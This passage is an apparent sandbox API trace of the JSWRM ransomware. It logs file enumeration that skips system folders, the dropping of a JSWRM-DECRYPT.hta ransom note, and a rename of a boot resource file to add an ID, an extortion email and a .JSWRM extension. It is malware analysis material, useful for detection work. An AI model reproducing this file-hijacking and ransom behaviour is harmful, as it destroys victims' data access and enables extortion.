ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf23e2f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.242] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.242] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.242] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2=".") returned 1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="..") returned 1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="...") returned 1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="windows") returned -1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="recovery") returned -1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="perflogs") returned -1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="documents and settings") returned -1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="$RECYCLE.BIN") returned 1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="system volume information") returned -1 [0064.242] lstrcmpiW (lpString1="bootres.dll", lpString2="msocache") returned -1 [0064.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootres.dll", lpUsedDefaultChar=0x0) returned 11 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootres.dll", lpUsedDefaultChar=0x0) returned 11 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.243] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="en-US", cAlternateFileName="")) returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0064.243] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.243] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0064.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0064.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23dc88 [0064.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0064.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0064.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.245] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0064.245] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.245] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0064.246] CloseHandle (hObject=0x3d4) returned 1 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.247] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\resources\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0064.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.247] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2320ac, cFileName=".", cAlternateFileName="")) returned 0x232100 [0064.247] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.247] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2320ac, cFileName="..", cAlternateFileName="")) returned 1 [0064.247] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.247] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.247] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x60002, dwReserved1=0x2320ac, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0064.247] lstrcmpiW (lpString1="bootres.dll.mui", lpString2=".") returned 1 [0064.247] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="..") returned 1 [0064.247] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="...") returned 1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="windows") returned -1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="recovery") returned -1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="perflogs") returned -1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="documents and settings") returned -1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="system volume information") returned -1 [0064.248] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="msocache") returned -1 [0064.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll.mui", cchWideChar=15, lpMultiByteStr=0x345f2a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootres.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0064.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0064.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootres.dll.mui", cchWideChar=15, lpMultiByteStr=0x345f278, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootres.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0064.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0064.248] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.248] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9788883304891792) returned 0 [0064.248] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.248] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0064.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.248] CloseHandle (hObject=0xffffffff) returned 1 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0064.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0064.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0064.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.249] MoveFileW (lpExistingFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), lpNewFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0064.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0064.249] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf4a07f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf4a07f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2320ac, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.250] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf4a07f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf4a07f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2320ac, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.250] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.250] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf23e2f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cf23e2f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cf4a07f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.250] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 